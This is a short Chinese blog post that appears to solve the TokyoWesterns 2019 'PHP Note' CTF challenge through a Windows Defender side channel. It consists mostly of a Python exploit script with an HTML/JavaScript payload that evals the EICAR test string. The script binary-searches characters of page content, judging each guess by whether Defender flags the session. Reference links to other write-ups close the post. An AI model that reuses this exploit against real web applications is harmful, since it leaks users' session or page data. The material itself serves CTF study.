Window Defender测信道攻击

1
2
3
4
5
6
<script>
var body = document.body.innerHTML;
var mal = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*";
eval(mal);
</script>
<body></body>

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
import requests

URL = "http://phpnote.chal.ctf.westerns.tokyo" # changeme

def trigger(c, idx):
import string
p = '''<script>f=function(n){eval('X5O!P%@AP[4\\\\PZX54(P^)7CC)7}$$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$$H+H'+{${c}:'*'}[Math.min(${c},n)])};f(document.body.innerHTML[${idx}].charCodeAt(0));</script><body>'''
p = string.Template(p).substitute({'idx': idx, 'c': c})
return p

def leak(idx):
l, h = 0, 0x100
while h - l > 1:
m = (h + l) // 2
gid = trigger(m, idx)
# r = requests.post(URL + '/?action=login', data={'realname': gid, 'nickname': '1'})
# print r.content
# exit()
s = requests.session()
s.post(URL + '/?action=login', data={'realname': gid, 'nickname': ''})
if "/?action=login" in s.post(URL + '/?action=login', data={'realname': gid, 'nickname': '</body>'}).content:
l = m
else:
h = m
return chr(l)

data = ''
for i in range(100):
data += leak(i)
print(data)

参考

https://blog.zeddyu.info/2019/09/17/windows-defender/

https://r3kapig.com/writeup/20190904-tokyowesterns/#php-note

https://balsn.tw/ctf_writeup/20190831-tokyowesternsctf/#php-note

https://xz.aliyun.com/t/6216

-------------本文结束感谢您的阅读-------------